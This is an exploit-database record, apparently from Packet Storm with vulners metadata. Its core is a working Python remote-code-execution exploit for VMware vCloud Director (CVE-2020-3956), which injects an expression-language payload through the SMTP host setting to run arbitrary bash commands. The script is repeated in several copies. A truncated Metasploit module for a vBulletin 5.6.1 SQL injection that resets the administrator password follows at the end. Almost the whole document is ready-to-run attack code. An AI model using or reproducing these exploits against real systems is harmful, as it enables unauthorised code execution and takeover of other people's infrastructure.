ID PACKETSTORM:157909
Type packetstorm
Reporter Tomas Melicher
Modified 2020-06-02T00:00:00
Description
`#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urllib.parse import urlparse
else:
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
session = requests.Session()
def login(url, username, password, verbose):
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
res = session.get(target_url)
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
if match:
tenant = match.group(1)
else:
print('[!] can\'t find tenant identifier')
return (None,None,None,None)
if verbose:
print('[*] tenant: %s'%(tenant))
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
if match: # Cloud Director 9.*
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
res = session.post(login_url, data={'username':username,'password':password})
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else: # Cloud Director 10.*
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
if match:
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
headers = {
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
'Accept': 'application/json;version=29.0',
'Content-type': 'application/json;version=29.0'
}
res = session.post(login_url, headers=headers)
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else:
print('[!] url for login form was not found')
return (None,None,None,None)
cookies = session.cookies.get_dict()
jwt = cookies['vcloud_jwt']
session_id = cookies['vcloud_session_id']
if verbose:
print('[*] jwt token: %s'%(jwt))
print('[*] session_id: %s'%(session_id))
res = session.get(target_url)
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
if match is None:
print('[!] organization not found')
return (None,None,None,None)
organization = match.group(1)
if verbose:
print('[*] organization name: %s'%(organization))
match = re.search(r'orgId : \'([^\']+)', res.content)
if match is None:
print('[!] orgId not found')
return (None,None,None,None)
org_id = match.group(1)
if verbose:
print('[*] organization identifier: %s'%(org_id))
return (jwt,session_id,organization,org_id)
def exploit(url, username, password, command, verbose):
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
if jwt is None:
return
headers = {
'Accept': 'application/*+xml;version=29.0',
'Authorization': 'Bearer %s'%jwt,
'x-vcloud-authorization': session_id
}
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
res = session.get(admin_url, headers=headers)
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
if match:
version = match.group(1)
if verbose:
print('[*] detected version of Cloud Director: %s'%(version))
else:
version = None
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
res = session.put(email_settings_url, data=data, headers=headers)
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
if verbose:
print('')
try:
print(base64.b64decode(match.group(1)))
except Exception:
print(res.content)
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)
`
{"id": "PACKETSTORM:157909", "bulletinFamily": "exploit", "title": "vCloud Director 9.7.0.15498291 Remote Code Execution", "description": "", "published": "2020-06-02T00:00:00", "modified": "2020-06-02T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/157909/vCloud-Director-9.7.0.15498291-Remote-Code-Execution.html", "reporter": "Tomas Melicher", "references": [], "cvelist": ["CVE-2020-3956"], "type": "packetstorm", "lastseen": "2020-06-04T01:13:15", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "00ce83c9247b8e71c4d3bef15158e5f4"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "3d9b01c7eef6f2c9a3ba0edec2190148"}, {"key": "modified", "hash": "e9aa050b267927c86b4be5213ddafcaa"}, {"key": "published", "hash": "e9aa050b267927c86b4be5213ddafcaa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4d8081dd9ca99d7d42632e9b3774422e"}, {"key": "sourceData", "hash": "d83f07f90b1a4c0888450dbc9cfbf10a"}, {"key": "sourceHref", "hash": "bbf4e99f86e6c3045589968e10872d99"}, {"key": "title", "hash": "1dbc9b517869b742d644a94722129fd4"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "hash": "a5d58512cbf83931edfab1a8c9b2f7fbf00dd44907dfaf56a61e820afd50fddf", "viewCount": 204, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-3956"]}, {"type": "0daydb", "idList": ["0DAYDB:9B958AB6A7A8570A18E180B0B8D9B834", "0DAYDB:53D8E76BA26E5E7A0D38F61CC5944072", "0DAYDB:E066DA109816BEBD03E4BEAC95DA59DB"]}, {"type": "thn", "idList": ["THN:B363D9388FA707DF636CA4F8E0FC08BA"]}, {"type": "nessus", "idList": ["VMWARE_CLOUD_DIRECTOR_VMSA-2020-0010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157945"]}, {"type": "exploitdb", "idList": ["EDB-ID:48540"]}], "modified": "2020-06-04T01:13:15", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-06-04T01:13:15", "rev": 2}, "vulnersScore": 7.0}, "objectVersion": "1.3", "sourceHref": "https://packetstormsecurity.com/files/download/157909/vclouddirector970-exec.txt", "sourceData": "`#!/usr/bin/python \n# Exploit Title: vCloud Director - Remote Code Execution \n# Exploit Author: Tomas Melicher \n# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ \n# Date: 2020-05-24 \n# Vendor Homepage: https://www.vmware.com/ \n# Software Link: https://www.vmware.com/products/cloud-director.html \n# Tested On: vCloud Director 9.7.0.15498291 \n# Vulnerability Description: \n# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. \n \nimport argparse # pip install argparse \nimport base64, os, re, requests, sys \nif sys.version_info >= (3, 0): \nfrom urllib.parse import urlparse \nelse: \nfrom urlparse import urlparse \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nPAYLOAD_TEMPLATE = \"${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}\" \nsession = requests.Session() \n \ndef login(url, username, password, verbose): \ntarget_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) \nres = session.get(target_url) \nmatch = re.search(r'tenant:([^\"]+)', res.content, re.IGNORECASE) \nif match: \ntenant = match.group(1) \nelse: \nprint('[!] can\\'t find tenant identifier') \nreturn (None,None,None,None) \n \nif verbose: \nprint('[*] tenant: %s'%(tenant)) \n \nmatch = re.search(r'security_check\\?[^\"]+', res.content, re.IGNORECASE) \nif match: # Cloud Director 9.* \nlogin_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) \nres = session.post(login_url, data={'username':username,'password':password}) \nif res.status_code == 401: \nprint('[!] invalid credentials') \nreturn (None,None,None,None) \nelse: # Cloud Director 10.* \nmatch = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) \nif match: \nlogin_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) \nheaders = { \n'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), \n'Accept': 'application/json;version=29.0', \n'Content-type': 'application/json;version=29.0' \n} \nres = session.post(login_url, headers=headers) \nif res.status_code == 401: \nprint('[!] invalid credentials') \nreturn (None,None,None,None) \nelse: \nprint('[!] url for login form was not found') \nreturn (None,None,None,None) \n \ncookies = session.cookies.get_dict() \njwt = cookies['vcloud_jwt'] \nsession_id = cookies['vcloud_session_id'] \n \nif verbose: \nprint('[*] jwt token: %s'%(jwt)) \nprint('[*] session_id: %s'%(session_id)) \n \nres = session.get(target_url) \nmatch = re.search(r'organization : \\'([^\\']+)', res.content, re.IGNORECASE) \nif match is None: \nprint('[!] organization not found') \nreturn (None,None,None,None) \norganization = match.group(1) \nif verbose: \nprint('[*] organization name: %s'%(organization)) \n \nmatch = re.search(r'orgId : \\'([^\\']+)', res.content) \nif match is None: \nprint('[!] orgId not found') \nreturn (None,None,None,None) \norg_id = match.group(1) \nif verbose: \nprint('[*] organization identifier: %s'%(org_id)) \n \nreturn (jwt,session_id,organization,org_id) \n \n \ndef exploit(url, username, password, command, verbose): \n(jwt,session_id,organization,org_id) = login(url, username, password, verbose) \nif jwt is None: \nreturn \n \nheaders = { \n'Accept': 'application/*+xml;version=29.0', \n'Authorization': 'Bearer %s'%jwt, \n'x-vcloud-authorization': session_id \n} \nadmin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) \nres = session.get(admin_url, headers=headers) \nmatch = re.search(r'<description>\\s*([^<\\s]+)', res.content, re.IGNORECASE) \nif match: \nversion = match.group(1) \nif verbose: \nprint('[*] detected version of Cloud Director: %s'%(version)) \nelse: \nversion = None \nprint('[!] can\\'t find version of Cloud Director, assuming it is more than 10.0') \n \nemail_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) \n \npayload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) \ndata = '<root:OrgEmailSettings xmlns:root=\"http://www.vmware.com/vcloud/v1.5\"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' \ndata += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' \ndata += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' \ndata += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) \ndata += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' \nres = session.put(email_settings_url, data=data, headers=headers) \nmatch = re.search(r'value:\\s*\\[([^\\]]+)\\]', res.content) \n \nif verbose: \nprint('') \ntry: \nprint(base64.b64decode(match.group(1))) \nexcept Exception: \nprint(res.content) \n \n \nparser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') \nparser.add_argument('-v', action='store_true') \nparser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) \nparser.add_argument('-u', metavar='username', required=True) \nparser.add_argument('-p', metavar='password', required=True) \nparser.add_argument('-c', metavar='command', help='command to execute', default='id') \nargs = parser.parse_args() \n \nurl = urlparse(args.t) \nexploit(url, args.u, args.p, args.c, args.v) \n`\n"}
{"cve": [{"lastseen": "2020-06-04T15:19:55", "bulletinFamily": "NVD", "description": "VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.", "modified": "2020-06-03T18:15:00", "id": "CVE-2020-3956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3956", "published": "2020-05-20T14:15:00", "title": "CVE-2020-3956", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "bulletinFamily": "exploit", "description": "CVE-2020-3956 vCloud Director version 9.7.0.15498291 suffers from a remote code execution vulnerability.", "modified": "2020-06-03T15:54:57", "published": "2020-06-03T15:54:57", "id": "0DAYDB:9B958AB6A7A8570A18E180B0B8D9B834", "href": "https://0daydb.com/vcloud-director-9-7-0-15498291-cve-2020-3956-remote-code-execution.html", "title": "vCloud Director 9.7.0.15498291 CVE-2020-3956 - Remote Code Execution", "type": "0daydb", "sourceData": "#!/usr/bin/python\n# Exploit Title: vCloud Director - Remote Code Execution\n# Exploit Author: Tomas Melicher\n# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/\n# Date: 2020-05-24\n# Vendor Homepage: https://www.vmware.com/\n# Software Link: https://www.vmware.com/products/cloud-director.html\n# Tested On: vCloud Director 9.7.0.15498291\n# Vulnerability Description: \n# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.\n\nimport argparse # pip install argparse\nimport base64, os, re, requests, sys\nif sys.version_info >= (3, 0):\n from urllib.parse import urlparse\nelse:\n from urlparse import urlparse\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nPAYLOAD_TEMPLATE = \"${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}\"\nsession = requests.Session()\n\ndef login(url, username, password, verbose):\n target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)\n res = session.get(target_url)\n match = re.search(r'tenant:([^\"]+)', res.content, re.IGNORECASE)\n if match:\n tenant = match.group(1)\n else:\n print('[!] can\\'t find tenant identifier')\n return (None,None,None,None)\n\n if verbose:\n print('[*] tenant: %s'%(tenant))\n\n match = re.search(r'security_check\\?[^\"]+', res.content, re.IGNORECASE)\n if match: # Cloud Director 9.*\n login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))\n res = session.post(login_url, data={'username':username,'password':password})\n if res.status_code == 401:\n print('[!] invalid credentials')\n return (None,None,None,None)\n else: # Cloud Director 10.*\n match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)\n if match:\n login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))\n headers = {\n 'Authorization': 'Basic %s'%(base64.b64encode('%[email\u00a0protected]%s:%s'%(username,tenant,password))),\n 'Accept': 'application/json;version=29.0',\n 'Content-type': 'application/json;version=29.0'\n }\n res = session.post(login_url, headers=headers)\n if res.status_code == 401:\n print('[!] invalid credentials')\n return (None,None,None,None)\n else:\n print('[!] url for login form was not found')\n return (None,None,None,None)\n\n cookies = session.cookies.get_dict()\n jwt = cookies['vcloud_jwt']\n session_id = cookies['vcloud_session_id']\n\n if verbose:\n print('[*] jwt token: %s'%(jwt))\n print('[*] session_id: %s'%(session_id))\n\n res = session.get(target_url)\n match = re.search(r'organization : \\'([^\\']+)', res.content, re.IGNORECASE)\n if match is None:\n print('[!] organization not found')\n return (None,None,None,None)\n organization = match.group(1)\n if verbose:\n print('[*] organization name: %s'%(organization))\n\n match = re.search(r'orgId : \\'([^\\']+)', res.content)\n if match is None:\n print('[!] orgId not found')\n return (None,None,None,None)\n org_id = match.group(1)\n if verbose:\n print('[*] organization identifier: %s'%(org_id))\n\n return (jwt,session_id,organization,org_id)\n\n\ndef exploit(url, username, password, command, verbose):\n (jwt,session_id,organization,org_id) = login(url, username, password, verbose)\n if jwt is None:\n return\n\n headers = {\n 'Accept': 'application/*+xml;version=29.0',\n 'Authorization': 'Bearer %s'%jwt,\n 'x-vcloud-authorization': session_id\n }\n admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)\n res = session.get(admin_url, headers=headers)\n match = re.search(r'<description>\\s*([^<\\s]+)', res.content, re.IGNORECASE)\n if match:\n version = match.group(1)\n if verbose:\n print('[*] detected version of Cloud Director: %s'%(version))\n else:\n version = None\n print('[!] can\\'t find version of Cloud Director, assuming it is more than 10.0')\n\n email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)\n\n payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))\n data = '<root:OrgEmailSettings xmlns:root=\"http://www.vmware.com/vcloud/v1.5\"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'\n data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'\n data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'\n data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)\n data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'\n res = session.put(email_settings_url, data=data, headers=headers)\n match = re.search(r'value:\\s*\\[([^\\]]+)\\]', res.content)\n\n if verbose:\n print('')\n try:\n print(base64.b64decode(match.group(1)))\n except Exception:\n print(res.content)\n\n\nparser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')\nparser.add_argument('-v', action='store_true')\nparser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)\nparser.add_argument('-u', metavar='username', required=True)\nparser.add_argument('-p', metavar='password', required=True)\nparser.add_argument('-c', metavar='command', help='command to execute', default='id')\nargs = parser.parse_args()\n\nurl = urlparse(args.t)\nexploit(url, args.u, args.p, args.c, args.v)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "bulletinFamily": "exploit", "description": "VMWare vCloud Director version 9.7.0.15498291 suffers from a remote code execution vulnerability.", "modified": "2020-06-06T15:10:06", "published": "2020-06-06T15:10:05", "id": "0DAYDB:E066DA109816BEBD03E4BEAC95DA59DB", "href": "https://0daydb.com/vmware-vcloud-director-9-7-0-15498291-remote-code-execution.html", "title": "VMWare vCloud Director 9.7.0.15498291 - Remote Code Execution", "type": "0daydb", "sourceData": "# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution\n# Exploit Author: Tomas Melicher\n# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/\n# Date: 2020-05-24\n# Vendor Homepage: https://www.vmware.com/\n# Software Link: https://www.vmware.com/products/cloud-director.html\n# Tested On: vCloud Director 9.7.0.15498291\n# Vulnerability Description: \n# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.\n\n#!/usr/bin/python\n\nimport argparse # pip install argparse\nimport base64, os, re, requests, sys\nif sys.version_info >= (3, 0):\n from urllib.parse import urlparse\nelse:\n from urlparse import urlparse\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nPAYLOAD_TEMPLATE = \"${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}\"\nsession = requests.Session()\n\ndef login(url, username, password, verbose):\n target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)\n res = session.get(target_url)\n match = re.search(r'tenant:([^\"]+)', res.content, re.IGNORECASE)\n if match:\n tenant = match.group(1)\n else:\n print('[!] can\\'t find tenant identifier')\n return\n\n if verbose:\n print('[*] tenant: %s'%(tenant))\n\n match = re.search(r'security_check\\?[^\"]+', res.content, re.IGNORECASE)\n if match: # Cloud Director 9.*\n login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))\n res = session.post(login_url, data={'username':username,'password':password})\n if res.status_code == 401:\n print('[!] invalid credentials')\n return\n else: # Cloud Director 10.*\n match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)\n if match:\n login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))\n headers = {\n 'Authorization': 'Basic %s'%(base64.b64encode('%[email\u00a0protected]%s:%s'%(username,tenant,password))),\n 'Accept': 'application/json;version=29.0',\n 'Content-type': 'application/json;version=29.0'\n }\n res = session.post(login_url, headers=headers)\n if res.status_code == 401:\n print('[!] invalid credentials')\n return\n else:\n print('[!] url for login form was not found')\n return\n\n cookies = session.cookies.get_dict()\n jwt = cookies['vcloud_jwt']\n session_id = cookies['vcloud_session_id']\n\n if verbose:\n print('[*] jwt token: %s'%(jwt))\n print('[*] session_id: %s'%(session_id))\n\n res = session.get(target_url)\n match = re.search(r'organization : \\'([^\\']+)', res.content, re.IGNORECASE)\n if match is None:\n print('[!] organization not found')\n return\n organization = match.group(1)\n if verbose:\n print('[*] organization name: %s'%(organization))\n\n match = re.search(r'orgId : \\'([^\\']+)', res.content)\n if match is None:\n print('[!] orgId not found')\n return\n org_id = match.group(1)\n if verbose:\n print('[*] organization identifier: %s'%(org_id))\n\n return (jwt,session_id,organization,org_id)\n\n\ndef exploit(url, username, password, command, verbose):\n (jwt,session_id,organization,org_id) = login(url, username, password, verbose)\n\n headers = {\n 'Accept': 'application/*+xml;version=29.0',\n 'Authorization': 'Bearer %s'%jwt,\n 'x-vcloud-authorization': session_id\n }\n admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)\n res = session.get(admin_url, headers=headers)\n match = re.search(r'<description>\\s*([^<\\s]+)', res.content, re.IGNORECASE)\n if match:\n version = match.group(1)\n if verbose:\n print('[*] detected version of Cloud Director: %s'%(version))\n else:\n version = None\n print('[!] can\\'t find version of Cloud Director, assuming it is more than 10.0')\n\n email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)\n\n payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))\n data = '<root:OrgEmailSettings xmlns:root=\"http://www.vmware.com/vcloud/v1.5\"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'\n data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'\n data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'\n data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)\n data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'\n res = session.put(email_settings_url, data=data, headers=headers)\n match = re.search(r'value:\\s*\\[([^\\]]+)\\]', res.content)\n\n if verbose:\n print('')\n try:\n print(base64.b64decode(match.group(1)))\n except Exception:\n print(res.content)\n\n\nparser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')\nparser.add_argument('-v', action='store_true')\nparser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)\nparser.add_argument('-u', metavar='username', required=True)\nparser.add_argument('-p', metavar='password', required=True)\nparser.add_argument('-c', metavar='command', help='command to execute', default='id')\nargs = parser.parse_args()\n\nurl = urlparse(args.t)\nexploit(url, args.u, args.p, args.c, args.v)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a SQL injection vulnerability found in vBulletin versions 5.6.1", "modified": "2020-06-03T15:53:27", "published": "2020-06-03T15:53:27", "id": "0DAYDB:53D8E76BA26E5E7A0D38F61CC5944072", "href": "https://0daydb.com/vbulletin-5-6-1-cve-2020-12720-sql-injection.html", "title": "vBulletin 5.6.1 CVE-2020-12720 - SQL Injection", "type": "0daydb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection',\n 'Description' => %q{\n This module exploits a SQL injection vulnerability found in vBulletin 5.6.1 and earlier\n This module uses the getIndexableContent vulnerability to reset the administrators password,\n it then uses the administrators login information to achieve RCE on the target. This module\n has been tested successfully on VBulletin Version 5.6.1 on Ubuntu Linux distribution.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Charles Fol <folcharles[at]gmail.com>', # (@cfreal_) CVE\n 'Zenofex <zenofex[at]exploitee.rs>', # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-12720'],\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n ['Automatic', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-03-12',\n 'DefaultTarget' => 0\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Path to vBulletin', '/']),\n OptInt.new('NODE', [false, 'Valid Node ID']),\n OptInt.new('MINNODE', [true, 'Valid Node ID', 1]),\n OptInt.new('MAXNODE', [true, 'Valid Node ID', 200]),\n OptBool.new('MANUALLOSTPASS', [false, 'true if an administrator lost password request has already been sent.', false])\n ])\n end\n\n # Performs SQLi attack\n def do_sqli(node_id, tbl_prfx, field, table, condition)\n where_cond = condition.nil? || condition == '' ? '' : \"where #{condition}\"\n injection = \" UNION ALL SELECT 0x2E,0x74,0x68,0x65,0x2E,0x65,0x78,0x70,0x6C,0x6F,0x69,0x74,0x65,0x65,0x72,0x73,0x2E,#{field},0x2E,0x7A,0x65,0x6E,0x6F,0x66,0x65,0x78 \"\n injection << \"from #{tbl_prfx}#{table} #{where_cond}--\"\n\n print_status(\"Performing SQL injection on target to retrieve '#{field}' from '#{tbl_prfx}#{table}'.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'content_infraction', 'getIndexableContent'),\n 'vars_post' => {\n 'nodeId[nodeid]' => \"#{node_id}#{injection}\"\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['rawtext']\n\n parsed_resp['rawtext']\n end\n\n # Gets human verification token\n def get_hv_hash\n print_status(\"Making request to '#{target_uri.path}/ajax/api/hv/generateToken' to retrieve HV token.\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'generateToken'),\n 'vars_post' => {\n 'securitytoken' => 'guest'\n }\n })\n\n return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['hash']\n\n hv_hash = parsed_resp['hash']\n print_good(\"Retrieved '#{hv_hash}' human verification token.\")\n hv_hash\n end\n\n # Gets the human verification (question based) answer\n def get_hv_ques_answer(node_id, tbl_prfx, questionid)\n print_status(\"Using HV token '#{questionid}' and SQLinjection to determine HV question answer.\")\n hv_answer = do_sqli(node_id, tbl_prfx, 